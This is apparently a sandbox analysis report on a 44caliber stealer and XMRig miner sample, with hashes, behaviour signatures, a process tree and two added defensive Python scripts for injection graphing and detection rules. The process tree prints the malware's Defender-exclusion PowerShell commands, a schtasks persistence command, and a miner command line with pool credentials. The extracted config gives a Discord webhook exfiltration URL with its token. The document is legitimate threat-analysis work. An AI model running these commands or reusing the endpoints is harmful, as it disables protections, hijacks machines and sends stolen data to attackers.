Analysis
- max time kernel: 167s
- max time network: 184s
- platform: windows10-2004_x64
- resource: win10v2004-20220310-en
- submitted: 20-03-2022 05:19

Tasks
- Static task: static1
- Behavioral task: behavioral1 (Sample: 86523374.exe, Resource: win7-20220310-en)
General
- Target: 86523374.exe
- Size: 5.2MB
- MD5: 23c2521d2d7f41cdc515db9c7a7d6dcb
- SHA1: ba422cc6f49b1639d35d61ea9ddec24149649929
- SHA256: e2d81a70b783df979b49f9caf84b20076533e37068b2db60e6d589eec5bacee4
- SHA512: 486ce40687b16f67d8f1473ecc31aadd979fff43bc836b48d502efcf5eb91e1de60f3e47c0e1df0592b17bf7992016c13534fdd2c5afb2b3f1f4482262340bfa
Malware Config
Extracted
- Family: 44caliber
- C2 (Discord webhook): https://discordapp.com/api/webhooks/934716186313240606/NIuB64dK4IPafrX9FRy2wNNRrBnOxvdLjio6Ou2fEKxC9HrdYgZQcnvkOx-a4O9pNzdW
Signatures

XMRig Miner Payload (3 IoCs)
  resource | yara_rule
  behavioral2/memory/2432-179-0x0000000140000000-0x0000000140786000-memory.dmp | xmrig
  behavioral2/memory/2432-180-0x0000000140000000-0x0000000140786000-memory.dmp | xmrig
  behavioral2/memory/2432-181-0x0000000140000000-0x0000000140786000-memory.dmp | xmrig

Executes dropped EXE (5 IoCs)
  pid | process
  4788 | KLNR.exe
  4496 | Insidious2.exe
  4468 | GTAHACK.exe
  1100 | services64.exe
  2620 | sihost64.exe

Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
  description | ioc | process
  Key value queried | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation | 86523374.exe

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

Looks up external IP address via web service (2 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow | ioc
  40 | freegeoip.app
  39 | freegeoip.app

Drops file in System32 directory (4 IoCs)
WR64.sys is the WinRing0 kernel driver that XMRig loads to program CPU MSRs for RandomX; C:\Windows\system32\Microsoft\Libs is not a standard Windows directory.
  description | ioc | process
  File created | C:\Windows\system32\services64.exe | conhost.exe
  File opened for modification | C:\Windows\system32\services64.exe | conhost.exe
  File created | C:\Windows\system32\Microsoft\Libs\sihost64.exe | conhost.exe
  File created | C:\Windows\system32\Microsoft\Libs\WR64.sys | conhost.exe

Suspicious use of NtSetInformationThreadHideFromDebugger (1 IoC)
  pid | process
  4788 | KLNR.exe

Suspicious use of SetThreadContext (1 IoC)
  description | pid | process | target process
  PID 4624 set thread context of 2432 | 4624 | conhost.exe | explorer.exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). The sandbox's stock description calls this likely ransomware behaviour, but nothing else in this report supports that (no file encryption or ransom-note activity is recorded); here it is more consistent with the stealer enumerating drives for files to collect.
Program crash (2 IoCs)
  pid | pid_target | process | target process
  2020 | 2432 | WerFault.exe | explorer.exe
  1144 | 2432 | WerFault.exe | explorer.exe

Checks processor information in registry (2 TTPs, 2 IoCs)
Processor information is often read in order to detect sandboxing environments.
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | Insidious2.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | Insidious2.exe

Creates scheduled task(s) (1 TTP, 1 IoC)
Schtasks is often used by malware for persistence or to perform post-infection execution.

Suspicious behavior: EnumeratesProcesses (15 IoCs)
  pid | process
  4496 | Insidious2.exe
  4496 | Insidious2.exe
  4496 | Insidious2.exe
  2136 | conhost.exe
  1844 | powershell.exe
  1844 | powershell.exe
  1652 | powershell.exe
  1652 | powershell.exe
  4496 | Insidious2.exe
  4624 | conhost.exe
  4624 | conhost.exe
  1904 | powershell.exe
  1904 | powershell.exe
  4156 | powershell.exe
  4156 | powershell.exe

Suspicious use of AdjustPrivilegeToken (7 IoCs)
  description | pid | process
  Token: SeDebugPrivilege | 4496 | Insidious2.exe
  Token: SeDebugPrivilege | 2136 | conhost.exe
  Token: SeDebugPrivilege | 1844 | powershell.exe
  Token: SeDebugPrivilege | 1652 | powershell.exe
  Token: SeDebugPrivilege | 4624 | conhost.exe
  Token: SeDebugPrivilege | 1904 | powershell.exe
  Token: SeDebugPrivilege | 4156 | powershell.exe

Suspicious use of SetWindowsHookEx (1 IoC)
  pid | process
  4788 | KLNR.exe

Suspicious use of WriteProcessMemory (58 IoCs)
Identical rows are collapsed; the last column is how many times the row appears in the report.
  pid | process | target pid | target process | rows
  5036 | 86523374.exe | 4788 | KLNR.exe | 3
  5036 | 86523374.exe | 4496 | Insidious2.exe | 2
  5036 | 86523374.exe | 4468 | GTAHACK.exe | 2
  4468 | GTAHACK.exe | 2136 | conhost.exe | 3
  4788 | KLNR.exe | 1572 | fondue.exe | 3
  1572 | fondue.exe | 1112 | FonDUE.EXE | 2
  2136 | conhost.exe | 1120 | cmd.exe | 2
  1120 | cmd.exe | 1844 | powershell.exe | 2
  2136 | conhost.exe | 2804 | cmd.exe | 2
  2804 | cmd.exe | 844 | schtasks.exe | 2
  1120 | cmd.exe | 1652 | powershell.exe | 2
  2136 | conhost.exe | 4900 | cmd.exe | 2
  4900 | cmd.exe | 1100 | services64.exe | 2
  1100 | services64.exe | 4624 | conhost.exe | 3
  4624 | conhost.exe | 1736 | cmd.exe | 2
  1736 | cmd.exe | 1904 | powershell.exe | 2
  4624 | conhost.exe | 2620 | sihost64.exe | 2
  1736 | cmd.exe | 4156 | powershell.exe | 2
  4624 | conhost.exe | 2432 | explorer.exe | 15
  2620 | sihost64.exe | 4468 | conhost.exe | 3
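The WriteProcessMemory and SetThreadContext tables above are more useful as a graph than as 58 rows. The script below is an added example, not part of the sandbox report: it parses rows in the sandbox's own rendering, counts writes per (source, target) pair, and labels a pair that also received a SetThreadContext as hollowing-like. The row subset is copied from this report (the conhost.exe to explorer.exe row repeats 15 times there); the labels and the write-count threshold are this example's own heuristic, resting on the assumption that plain process creation shows up as two or three parent-to-child writes in this sandbox, which is what every ordinary parent/child pair in the report shows.

```python
"""Process-injection graph from sandbox API-signature rows (added example).

WRITE_ROWS / CONTEXT_ROWS are copied from this report's WriteProcessMemory and
SetThreadContext tables (a subset). Labels and the threshold are assumptions.
"""
import re
from collections import Counter

# Row shape as the sandbox renders it:
#   "PID <src> wrote to memory of <dst> <src> <src image> <dst image>"
WRITE_RE = re.compile(
    r"PID (?P<src>\d+) wrote to memory of (?P<dst>\d+) (?P=src) (?P<simg>\S+) (?P<dimg>\S+)")
CONTEXT_RE = re.compile(
    r"PID (?P<src>\d+) set thread context of (?P<dst>\d+) (?P=src) (?P<simg>\S+) (?P<dimg>\S+)")

WRITE_ROWS = (
    ["PID 5036 wrote to memory of 4788 5036 86523374.exe KLNR.exe"] * 3
    + ["PID 5036 wrote to memory of 4496 5036 86523374.exe Insidious2.exe"] * 2
    + ["PID 1100 wrote to memory of 4624 1100 services64.exe conhost.exe"] * 3
    + ["PID 4624 wrote to memory of 2620 4624 conhost.exe sihost64.exe"] * 2
    + ["PID 4624 wrote to memory of 2432 4624 conhost.exe explorer.exe"] * 15
    + ["PID 2620 wrote to memory of 4468 2620 sihost64.exe conhost.exe"] * 3
)
CONTEXT_ROWS = ["PID 4624 set thread context of 2432 4624 conhost.exe explorer.exe"]


def parse_rows(rows, pattern):
    """Count (src_pid, dst_pid) edges and remember each pid's image name."""
    edges, images = Counter(), {}
    for row in rows:
        m = pattern.search(row)
        if not m:
            continue
        src, dst = int(m["src"]), int(m["dst"])
        edges[(src, dst)] += 1
        images[src], images[dst] = m["simg"], m["dimg"]
    return edges, images


def classify(write_rows, context_rows, heavy_threshold=4):
    """Label every writer/target pair seen in the write rows."""
    writes, images = parse_rows(write_rows, WRITE_RE)
    contexts, more = parse_rows(context_rows, CONTEXT_RE)
    images.update(more)
    findings = []
    for (src, dst), n in sorted(writes.items()):
        if (src, dst) in contexts:
            label = "hollowing-like"   # memory writes plus a thread-context change on one target
        elif n >= heavy_threshold:
            label = "heavy-write"      # many writes, no context change seen: review manually
        else:
            label = "spawn-write"      # 2-3 writes: consistent with plain process creation
        findings.append({"src": src, "dst": dst, "src_image": images[src],
                         "dst_image": images[dst], "writes": n, "label": label})
    return findings


def lineage(findings, pid):
    """Walk writer edges back from pid to the root of the chain (root first).

    Sandbox PIDs are reused (4468 is GTAHACK.exe early in this report and a
    conhost.exe later), so real tooling should key on (pid, image, start time).
    """
    parents = {f["dst"]: f["src"] for f in findings}
    chain = [pid]
    while chain[-1] in parents and parents[chain[-1]] not in chain:
        chain.append(parents[chain[-1]])
    return list(reversed(chain))


if __name__ == "__main__":
    for f in classify(WRITE_ROWS, CONTEXT_ROWS):
        print(f)
    print("chain:", lineage(classify(WRITE_ROWS, CONTEXT_ROWS), 2432))
```

On this report's rows the only hollowing-like pair is conhost.exe (4624) writing 15 times into explorer.exe (2432), which is also the process whose memory matched the xmrig YARA rule; the chain for 2432 resolves to services64.exe (1100) -> conhost.exe (4624) -> explorer.exe (2432).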
Processes
(indentation shows parent/child nesting)

C:\Users\Admin\AppData\Local\Temp\86523374.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\86523374.exe"
  PID: 5036
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory

  C:\Users\Admin\AppData\Local\Temp\KLNR.exe
    cmdline: "C:\Users\Admin\AppData\Local\Temp\KLNR.exe"
    PID: 4788
    - Executes dropped EXE
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\fondue.exe
      cmdline: "C:\Windows\system32\fondue.exe" /enable-feature:NetFx3 /caller-name:mscoreei.dll
      PID: 1572
      - Suspicious use of WriteProcessMemory
      (fondue.exe launched with caller mscoreei.dll is the .NET shim asking Windows to enable the .NET Framework 3.5 feature; it shows KLNR.exe targets .NET 3.5 on a machine without it and is not an action of the malware itself)

      C:\Windows\system32\FonDUE.EXE
        cmdline: "C:\Windows\sysnative\FonDUE.EXE" /enable-feature:NetFx3 /caller-name:mscoreei.dll
        PID: 1112

  C:\Users\Admin\AppData\Local\Temp\Insidious2.exe
    cmdline: "C:\Users\Admin\AppData\Local\Temp\Insidious2.exe"
    PID: 4496
    - Executes dropped EXE
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe
    cmdline: "C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe"
    PID: 4468
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\conhost.exe
      cmdline: "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe"
      PID: 2136
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      C:\Windows\System32\cmd.exe
        cmdline: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
        PID: 1120
        - Suspicious use of WriteProcessMemory
        (excluding $env:SystemRoot, $env:SystemDrive and $env:HomeDrive plus every .exe and .dll effectively removes the whole system volume from Defender scanning; Add-MpPreference requires an elevated session, which is also what the /rl highest task below provides)

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          cmdline: powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
          PID: 1844
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          cmdline: powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
          PID: 1652
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

      C:\Windows\System32\cmd.exe
        cmdline: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
        PID: 2804
        - Suspicious use of WriteProcessMemory

        C:\Windows\system32\schtasks.exe
          cmdline: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
          PID: 844
          - Creates scheduled task(s)
          (logon-triggered persistence with highest privileges; the task and binary name imitate the legitimate services.exe, and the binary lives in System32 where it was dropped by PID 2136)

      C:\Windows\System32\cmd.exe
        cmdline: "cmd" cmd /c "C:\Windows\system32\services64.exe"
        PID: 4900
        - Suspicious use of WriteProcessMemory

        C:\Windows\system32\services64.exe
          cmdline: C:\Windows\system32\services64.exe
          PID: 1100
          - Executes dropped EXE
          - Suspicious use of WriteProcessMemory

          C:\Windows\System32\conhost.exe
            cmdline: "C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"
            PID: 4624
            - Drops file in System32 directory
            - Suspicious use of SetThreadContext
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory

            C:\Windows\System32\cmd.exe
              cmdline: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
              PID: 1736
              - Suspicious use of WriteProcessMemory

              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                cmdline: powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                PID: 1904
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken

              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                cmdline: powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                PID: 4156
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken

            C:\Windows\system32\Microsoft\Libs\sihost64.exe
              cmdline: "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
              PID: 2620
              - Executes dropped EXE
              - Suspicious use of WriteProcessMemory

              C:\Windows\System32\conhost.exe
                cmdline: "C:\Windows\System32\conhost.exe" "/sihost64"
                PID: 4468
                (PID 4468 is reused here; earlier in the run it belonged to GTAHACK.exe)

            C:\Windows\explorer.exe
              cmdline: C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6238470 --pass=GAMENAME --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth
              PID: 2432
              (the image is the legitimate C:\Windows\explorer.exe but the arguments are XMRig's RandomX options plus --cinit-* options that stock XMRig does not accept, indicating a wrapper around the miner; together with the SetThreadContext from PID 4624 and the xmrig YARA hits in this process's memory this is a hollowed explorer.exe running the miner. Pool: mine.bmpool.org:6004, user 6238470, password GAMENAME. The process was reported crashing twice, see the WerFault children below)

              C:\Windows\system32\WerFault.exe
                cmdline: C:\Windows\system32\WerFault.exe -u -p 2432 -s 288
                PID: 2020
                - Program crash

              C:\Windows\system32\WerFault.exe
                cmdline: C:\Windows\system32\WerFault.exe -u -p 2432 -s 332
                PID: 1144
                - Program crash

C:\Windows\system32\WerFault.exe
  cmdline: C:\Windows\system32\WerFault.exe -pss -s 452 -p 2432 -ip 2432
  PID: 2988

C:\Windows\system32\WerFault.exe
  cmdline: C:\Windows\system32\WerFault.exe -pss -s 184 -p 2432 -ip 2432
  PID: 4940
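The command lines in this tree, together with the webhook in the Malware Config section, are the parts of the report a detection engineer would turn into rules. The script below is an added example, not part of the sandbox report and not the malware's code: it runs three rules over process-creation records and pulls the Discord webhook ID out of the extracted config. PROCESS_EVENTS is constructed from this report's process tree as (pid, image, command line) tuples (the XMRig line omits the --cinit-stealth-targets blob); the rule names, severities, the masquerade image list and the Discord webhook URL pattern are this example's own assumptions rather than anything the report states.

```python
"""Detection rules for the behaviours in this report's process tree (added example).

PROCESS_EVENTS is constructed from the report; rule names, severities and the
webhook URL pattern are assumptions of this example, not facts from the report.
"""
import re

PROCESS_EVENTS = [
    (1844, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     'powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,'
     '$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"'),
    (1652, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell -Command \"Add-MpPreference -ExclusionExtension @('exe','dll') -Force\""),
    (2804, r"C:\Windows\System32\cmd.exe",  # wrapper shell carrying the same text as its child
     '"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" '
     '/tr "C:\\Windows\\system32\\services64.exe"'),
    (844, r"C:\Windows\system32\schtasks.exe",
     'schtasks /create /f /sc onlogon /rl highest /tn "services64" '
     '/tr "C:\\Windows\\system32\\services64.exe"'),
    (2432, r"C:\Windows\explorer.exe",  # --cinit-stealth-targets value omitted here
     'C:\\Windows\\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 '
     '--randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 '
     '--url=mine.bmpool.org:6004 --user=6238470 --pass=GAMENAME --cpu-max-threads-hint=40 '
     '--cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth'),
]
CONFIG_TEXT = ("44caliber https://discordapp.com/api/webhooks/934716186313240606/"
               "NIuB64dK4IPafrX9FRy2wNNRrBnOxvdLjio6Ou2fEKxC9HrdYgZQcnvkOx-a4O9pNzdW")

WEBHOOK_RE = re.compile(r"https://discord(?:app)?\.com/api/webhooks/(\d+)/([A-Za-z0-9_-]+)")
LONG_OPT_RE = re.compile(r'--([a-z0-9-]+)(?:="([^"]*)"|=(\S+))?')   # --name, --name=v, --name="v"
EXCLUSION_RE = re.compile(r"-Exclusion(Path|Extension)\s+@\(")
# Exclusions that in effect switch scanning off for the whole machine (assumed list).
BROAD_EXCLUSIONS = {"$env:SystemRoot", "$env:SystemDrive", "$env:HomeDrive", "exe", "dll"}
MASQUERADE_IMAGES = {"explorer.exe", "svchost.exe", "conhost.exe", "sihost.exe"}  # assumed list


def _paren_group(text, start):
    """Return the text inside the parenthesised group that opens at text[start]."""
    depth = 0
    for i in range(start, len(text)):
        if text[i] == "(":
            depth += 1
        elif text[i] == ")":
            depth -= 1
            if depth == 0:
                return text[start + 1:i]
    return text[start + 1:]


def _image_name(image):
    return image.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Run the three rules over (pid, image, cmdline) records and return findings."""
    findings = []
    for pid, image, cmd in events:
        name = _image_name(image)
        # Rule 1: Defender exclusion tampering. Matched on powershell.exe itself so the
        # cmd.exe wrapper that merely carries the same text is not double-counted.
        m = EXCLUSION_RE.search(cmd)
        if name == "powershell.exe" and m:
            items = [x.strip().strip("'\"") for x in
                     _paren_group(cmd, m.end() - 1).split(",") if x.strip()]
            findings.append({"rule": "defender_exclusion", "pid": pid, "kind": m.group(1),
                             "items": items,
                             "severity": "critical" if BROAD_EXCLUSIONS & set(items) else "high"})
        # Rule 2: logon-triggered scheduled task running with highest privileges.
        low = cmd.lower()
        if (name == "schtasks.exe" and "/create" in low
                and "/sc onlogon" in low and "/rl highest" in low):
            tn = re.search(r'/tn\s+"?([^"\s]+)"?', cmd)
            tr = re.search(r'/tr\s+"([^"]+)"', cmd)
            if tn and tr:
                findings.append({"rule": "schtasks_persistence", "pid": pid,
                                 "task": tn.group(1), "target": tr.group(1), "severity": "high"})
        # Rule 3: XMRig-style arguments, whichever image carries them (here explorer.exe).
        opts = {o.group(1): o.group(2) if o.group(2) is not None else o.group(3)
                for o in LONG_OPT_RE.finditer(cmd)}
        if "url" in opts and ((opts.get("algo") or "").startswith("rx")
                              or any(k.startswith("cinit-") for k in opts)):
            findings.append({"rule": "xmrig_miner", "pid": pid, "image": name,
                             "pool": opts["url"], "user": opts.get("user"),
                             "pass": opts.get("pass"),
                             "masquerade": name in MASQUERADE_IMAGES, "severity": "critical"})
    return findings


def webhook_iocs(config_text):
    """Pull Discord webhook IDs/tokens out of extracted-config text for blocking or reporting."""
    return [{"webhook_id": wid, "token": tok} for wid, tok in WEBHOOK_RE.findall(config_text)]


if __name__ == "__main__":
    for finding in detect(PROCESS_EVENTS):
        print(finding)
    print(webhook_iocs(CONFIG_TEXT))
```

Rule 1 matches on the powershell.exe image rather than on command-line text alone so that the cmd.exe wrapper (PID 2804 here, and 1120/1736 in the tree) does not produce a duplicate finding; rule 3 deliberately ignores the image name and flags the mining arguments wherever they appear, because the miner here runs inside a hollowed explorer.exe.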
Network
MITRE ATT&CK Enterprise v6
Downloads
(the report lists 15 downloaded/dropped files; entries with identical hashes are shown once with the number of times they appear)

- MD5: b245679121623b152bea5562c173ba11
  SHA1: 47cb7fc4cf67e29a87016a7308cdb8b1b4dc8e3d
  SHA256: 73d84fd03e38f1bbf8b2218f8a454f0879051855252fc76b63f20f46e7fd877f
  SHA512: 75e46843b1eafcc7dc4362630838895b7f399e57662a12bf0305a912c8e726b02e0a760b1b97a2c262b2d05fdb944b9ed81c338ad93e5eb5cb57bc651602e42c

- MD5: d85ba6ff808d9e5444a4b369f5bc2730
  SHA1: 31aa9d96590fff6981b315e0b391b575e4c0804a
  SHA256: 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
  SHA512: 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

- MD5: cadef9abd087803c630df65264a6c81c
  SHA1: babbf3636c347c8727c35f3eef2ee643dbcc4bd2
  SHA256: cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438
  SHA512: 7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

- MD5: e69c5554cfe965e000e33ee9f1cd88d5
  SHA1: ef74e8e9a0113870c87ece51d4e86040b1eeecdc
  SHA256: 712c2be9f3cff2c74ba7c7cd92208f724c8862277dd8b4f6f2605cc50fb4fdd0
  SHA512: 6a8e64e11df3fa1aa32f95387f3b43d2ed6f4c996db8cee9110586e4bb9eba604550235b6fa6a41beb6fcc31339cb969a6e79d3fcf1f7d42dcd4655cfee38a16

- MD5: 9a2c763c5ff40e18e49ad63c7c3b0088
  SHA1: 4b289ea34755323fa869da6ad6480d8d12385a36
  SHA256: 517807921c55bd16cd8a8bfae3d5dc19444c66f836b66acd5593e3080acbaf8e
  SHA512: 3af01926bc7de92076067d158d7250b206d396b3282ee0db43639d04d91bd9ff763acbce12c7822914824984a3c5fdd1b8dbf1ad2ee88233d47f0f808b746bc8

- (listed 4 times)
  MD5: 692461c05ba5cfb84d5fcb2bc56adafd
  SHA1: c9df2056da3af20175f9ab1942058ef778c438b2
  SHA256: 1bd4f98c3c59ba62e79448064f48661c2acbc87d85ecd1556f68a3e23a3c2e2c
  SHA512: 68cef4b8123f1b0c24adbe6f71817b5fa2df3100d112813cfa73b6c0a148717b9f354409cccb941a42ae9e60493bb4dafc2c99318088be8b9416e8a30776bf46

- (listed 2 times)
  MD5: 198458bfe3e5de2eb6737beb2d54c292
  SHA1: 59785684874f6b45205db1f96268593c97485dfe
  SHA256: d8657c28223f4e125ba12b4cc56dac08f48e5ef24c7e295f640f281ae456bfca
  SHA512: 7b10151a06424279cd676f78a61fb0245241fe795b2adb6a930bd331686d4a7843f0abd101c339a3f2c2ec341182b19f47f8e8ab1aaa41338a30d03ecbea5842

- (listed 2 times)
  MD5: 8563f76405eb62c0e2a62f57992cb413
  SHA1: 5f7ff11c5f7be4c15fe6a256f4712e6f98dbd918
  SHA256: a9021056e13fa4900943cab8c13718e9b82a55c6605624acc89539d5f7446838
  SHA512: e9ba6c5b44eb679bac303dcefb47196cc606a235269da7f58fa352f1b28c3edd6190311a8d79391d81bb71264f55650334edfb78f05a7bdaeee2b220b868b823

- (listed 2 times)
  MD5: 943c340e0da33f95572f0beb0fdf875b
  SHA1: d1081ddc04e6d52a737386d85a9193b2326ccf7c
  SHA256: 118a4f9a80ceef768290e81f123246d4adb50785591ff2de9f7cfecd459b5dc9
  SHA512: 51b8a3c5aaa54d0b4d0f544be2b2b05b1fef82427db0c614df35de8b654331c0150d72ab146f0b6d2e51356620df4ad70afad616fc1edd5d13c5410e25a06cd5